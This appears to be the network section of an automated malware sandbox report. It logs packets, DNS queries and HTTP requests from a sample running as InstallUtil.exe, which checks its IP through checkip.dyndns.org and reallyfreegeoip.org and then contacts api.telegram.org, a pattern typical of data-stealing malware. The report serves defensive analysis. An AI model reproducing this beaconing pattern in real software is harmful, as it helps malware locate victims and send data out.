                                                                                                                                                                                              Jan 10, 2025 09:29:20.598928928 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:21.008420944 CET44349882104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:21.012499094 CET49882443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:21.012528896 CET44349882104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:21.137563944 CET44349882104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:21.137618065 CET44349882104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:21.137763023 CET49882443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:21.138377905 CET49882443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:21.141683102 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:21.142896891 CET4988580192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:21.146723032 CET8049871193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:21.147131920 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:21.147677898 CET8049885193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:21.150271893 CET4988580192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:21.150393009 CET4988580192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:21.155195951 CET8049885193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:21.606020927 CET8049885193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:21.607290983 CET49888443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:21.607342005 CET44349888104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:21.607624054 CET49888443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:21.609400988 CET49888443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:21.609419107 CET44349888104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:21.661416054 CET4988580192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:22.084728956 CET44349888104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:22.086752892 CET49888443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:22.086786985 CET44349888104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:22.239352942 CET44349888104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:22.239418983 CET44349888104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:22.241976976 CET49888443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:22.241976976 CET49888443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:22.244702101 CET4989380192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:22.249552965 CET8049893193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:22.249638081 CET4989380192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:22.249783993 CET4989380192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:22.254610062 CET8049893193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:22.717125893 CET8049893193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:22.718353033 CET49898443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:22.718403101 CET44349898104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:22.718453884 CET49898443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:22.718691111 CET49898443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:22.718708038 CET44349898104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:22.762872934 CET4989380192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:23.181941032 CET44349898104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:23.183418989 CET49898443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:23.183454990 CET44349898104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:23.333373070 CET44349898104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:23.333439112 CET44349898104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:23.333688974 CET49898443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:23.334392071 CET49898443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:23.339425087 CET4989380192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:23.340035915 CET4990180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:23.344310999 CET8049893193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:23.344369888 CET4989380192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:23.344785929 CET8049901193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:23.344839096 CET4990180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:23.344961882 CET4990180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:23.349682093 CET8049901193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:23.844273090 CET8049901193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:23.849695921 CET49906443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:23.849762917 CET44349906104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:23.849841118 CET49906443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:23.853404045 CET49906443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:23.853423119 CET44349906104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:23.895781040 CET4990180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:24.308310032 CET44349906104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:24.313210964 CET49906443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:24.313242912 CET44349906104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:24.456923962 CET44349906104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:24.456993103 CET44349906104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:24.457137108 CET49906443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:24.457675934 CET49906443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:24.461100101 CET4990180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:24.462344885 CET4991280192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:24.466053009 CET8049901193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:24.466106892 CET4990180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:24.467169046 CET8049912193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:24.467386961 CET4991280192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:24.467472076 CET4991280192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:24.472209930 CET8049912193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:24.924742937 CET8049912193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:24.939640999 CET49915443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:24.939673901 CET44349915104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:24.941273928 CET49915443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:24.941560030 CET49915443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:24.941570997 CET44349915104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:24.973948956 CET4991280192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:25.425906897 CET44349915104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:25.427561045 CET49915443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:25.427617073 CET44349915104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:25.579262972 CET44349915104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:25.579339981 CET44349915104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:25.579605103 CET49915443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:25.579844952 CET49915443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:25.584021091 CET4991280192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:25.585432053 CET4991880192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:25.589057922 CET8049912193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:25.589122057 CET4991280192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:25.590286016 CET8049918193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:25.590353966 CET4991880192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:25.590614080 CET4991880192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:25.595441103 CET8049918193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.044668913 CET8049918193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.045785904 CET49923443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:26.045831919 CET44349923104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.045891047 CET49923443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:26.046153069 CET49923443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:26.046164989 CET44349923104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.098908901 CET4991880192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:26.500415087 CET44349923104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.511984110 CET49923443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:26.512010098 CET44349923104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.637660027 CET44349923104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.637723923 CET44349923104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.637787104 CET49923443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:26.642863035 CET49923443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:26.660450935 CET4991880192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:26.661369085 CET4992780192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:26.665441036 CET8049918193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.665498972 CET4991880192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:26.666179895 CET8049927193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.666245937 CET4992780192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:26.666353941 CET4992780192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:26.671201944 CET8049927193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.178261995 CET8049927193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.181241035 CET49931443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:27.181246996 CET44349931104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.181417942 CET49931443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:27.181626081 CET49931443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:27.181637049 CET44349931104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.223939896 CET4992780192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:27.657891989 CET44349931104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.659462929 CET49931443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:27.659502983 CET44349931104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.808928967 CET44349931104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.808999062 CET44349931104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.809225082 CET49931443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:27.809442997 CET49931443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:27.812280893 CET4992780192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:27.813394070 CET4993680192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:27.817266941 CET8049927193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.817327976 CET4992780192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:27.818152905 CET8049936193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.818219900 CET4993680192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:27.818296909 CET4993680192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:27.823035955 CET8049936193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.276055098 CET8049936193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.279222965 CET49940443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:28.279249907 CET44349940104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.279403925 CET49940443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:28.279721975 CET49940443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:28.279738903 CET44349940104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.317698002 CET4993680192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:28.762130022 CET44349940104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.764725924 CET49940443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:28.764754057 CET44349940104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.893416882 CET44349940104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.893496037 CET44349940104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.893553972 CET49940443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:28.894026995 CET49940443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:28.909579992 CET4993680192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:28.914675951 CET8049936193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.914752007 CET4993680192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:28.916816950 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:28.916862965 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.916930914 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:28.917311907 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:28.917325020 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:29.547259092 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:29.547363997 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:29.549150944 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:29.549159050 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:29.549405098 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:29.550815105 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:29.591332912 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:29.795135021 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:29.795186996 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:29.795481920 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:29.801717997 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:45.825251102 CET4988580192.168.2.4193.122.130.0

                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Jan 10, 2025 09:29:19.096127987 CET5396853192.168.2.41.1.1.1
                                                                                                                                                                                              Jan 10, 2025 09:29:19.102881908 CET53539681.1.1.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:19.764659882 CET6109553192.168.2.41.1.1.1
                                                                                                                                                                                              Jan 10, 2025 09:29:19.771550894 CET53610951.1.1.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:24.927187920 CET6242953192.168.2.41.1.1.1
                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET53624291.1.1.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.909495115 CET4948253192.168.2.41.1.1.1
                                                                                                                                                                                              Jan 10, 2025 09:29:28.916146994 CET53494821.1.1.1192.168.2.4

                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                              Jan 10, 2025 09:29:19.096127987 CET192.168.2.41.1.1.10xcacfStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:19.764659882 CET192.168.2.41.1.1.10xfdd4Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:24.927187920 CET192.168.2.41.1.1.10x5cbeStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:28.909495115 CET192.168.2.41.1.1.10x9f70Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                              Jan 10, 2025 09:29:19.102881908 CET1.1.1.1192.168.2.40xcacfNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:19.102881908 CET1.1.1.1192.168.2.40xcacfNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:19.102881908 CET1.1.1.1192.168.2.40xcacfNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:19.102881908 CET1.1.1.1192.168.2.40xcacfNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:19.102881908 CET1.1.1.1192.168.2.40xcacfNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:19.102881908 CET1.1.1.1192.168.2.40xcacfNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:19.771550894 CET1.1.1.1192.168.2.40xfdd4No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:19.771550894 CET1.1.1.1192.168.2.40xfdd4No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:19.771550894 CET1.1.1.1192.168.2.40xfdd4No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:19.771550894 CET1.1.1.1192.168.2.40xfdd4No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:19.771550894 CET1.1.1.1192.168.2.40xfdd4No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:19.771550894 CET1.1.1.1192.168.2.40xfdd4No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:19.771550894 CET1.1.1.1192.168.2.40xfdd4No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET1.1.1.1192.168.2.40x5cbeNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET1.1.1.1192.168.2.40x5cbeNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET1.1.1.1192.168.2.40x5cbeNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET1.1.1.1192.168.2.40x5cbeNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET1.1.1.1192.168.2.40x5cbeNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET1.1.1.1192.168.2.40x5cbeNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET1.1.1.1192.168.2.40x5cbeNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:28.916146994 CET1.1.1.1192.168.2.40x9f70No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                              • reallyfreegeoip.org
                                                                                                                                                                                              • api.telegram.org
                                                                                                                                                                                              • checkip.dyndns.org

                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              0192.168.2.449871193.122.130.0807968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Jan 10, 2025 09:29:19.148757935 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Jan 10, 2025 09:29:19.612875938 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:19 GMT
                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Request-ID: 9906273f056d04b489c61b9b3da4e0e7
                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                                              Jan 10, 2025 09:29:19.617446899 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                                              Jan 10, 2025 09:29:19.720211983 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:19 GMT
                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Request-ID: d5e8d634c3cf3e4e1859103b09b9fb8e
                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                                              Jan 10, 2025 09:29:20.445688009 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                                              Jan 10, 2025 09:29:20.550591946 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:20 GMT
                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Request-ID: 5a6eacecf33eb67b44e0bd372e351ce3
                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              1192.168.2.449885193.122.130.0807968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Jan 10, 2025 09:29:21.150393009 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                                              Jan 10, 2025 09:29:21.606020927 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:21 GMT
                                                                                                                                                                                              Content-Type: text/html
